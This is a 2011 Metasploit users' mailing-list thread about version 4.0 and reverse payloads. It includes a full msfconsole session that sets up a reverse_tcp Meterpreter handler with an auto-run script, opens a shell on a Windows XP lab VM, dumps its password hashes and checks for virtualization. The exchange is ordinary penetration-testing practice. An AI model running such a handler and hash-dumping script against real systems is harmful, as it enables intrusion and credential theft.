Re: News from Metasploit 4.

[Carlos Perez <carlos_perez () darkoperator com>]

Did you tried adding to the resource file

Run migrate -f

Cheers,
Carlos Perez

Sent from My Mobile Phone

On Aug 27, 2011, at 3:15 PM, Richard Miles <richard.k.miles () googlemail com> wrote:

> Hi Carlos
>
> I followed your step by step and it worked, I'm really a foul. Thanks a lot.
>
> By the way do you know if there is reverse_http(s) for windows 64 bits?
>
> Thanks, really thanks.
>
> On Sat, Aug 27, 2011 at 1:50 PM, Carlos Perez
> <dark0perator () pauldotcom com> wrote:
> > works for me
> > msf > use exploit/multi/handler
> > msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
> > PAYLOAD => windows/meterpreter/reverse_tcp
> > msf  exploit(handler) > set LHOST 192.168.1.100
> > LHOST => 192.168.1.100
> > msf  exploit(handler) > set AutoRunScript multi_console_command -rc /tmp/sample.rc
> > AutoRunScript => multi_console_command -rc /tmp/sample.rc
> > msf  exploit(handler) > set ExitOnSession false
> > ExitOnSession => false
> > msf  exploit(handler) > exploit -x -j
> > [*] Exploit running as background job.
> >
> > [*] Started reverse handler on 192.168.1.100:4444
> > [*] Starting the payload handler...
> > msf  exploit(handler) > cat /tmp/sample.rc
> > [*] exec: cat /tmp/sample.rc
> >
> > sysinfo
> > getuid
> > load priv
> > hashdump
> > run checkvm
> > msf  exploit(handler) >
> > [*] Sending stage (752128 bytes) to 192.168.1.115
> > [*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.115:1543) at 2011-08-27 14:49:29 -0400
> > [*] Session ID 1 (192.168.1.100:4444 -> 192.168.1.115:1543) processing AutoRunScript 'multi_console_command -rc 
> > /tmp/sample.rc'
> > [*] Running Command List ...
> > [*]     Running command sysinfo
> > Computer        : CARLOS-192FCD91
> > OS              : Windows XP (Build 2600, Service Pack 3).
> > Architecture    : x86
> > System Language : en_US
> > Meterpreter     : x86/win32
> > [*]     Running command getuid
> > Server username: CARLOS-192FCD91\Administrator
> > [*]     Running command load priv
> > [-] The 'priv' extension has already been loaded.
> > [*]     Running command hashdump
> > Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
> > Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
> > HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
> > HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
> > SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
> > [*]     Running command run checkvm
> > [*] Checking if target is a Virtual Machine .....
> > [*] This is a VMware Virtual Machine
> >
> > On Aug 26, 2011, at 4:16 PM, Richard Miles wrote:
> >
> > > Hi HD Moore,
> > >
> > > Thanks for links. Does the new reverse_http works in 64 bit Windows?
> > > How should I call it?
> > >
> > > Any follow-up on the other 2 questions on the e-mail?
> > >
> > > Thanks
> > >
> > > On Fri, Aug 26, 2011 at 9:19 AM, HD Moore <hdm () metasploit com> wrote:
> > > > The Metasploit blog includes quite a bit of information on 4.0:
> > > >  https://community.rapid7.com/community/metasploit?view=blog
> > > >
> > > > You can also see the release notes:
> > > >  https://community.rapid7.com/docs/DOC-1496
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework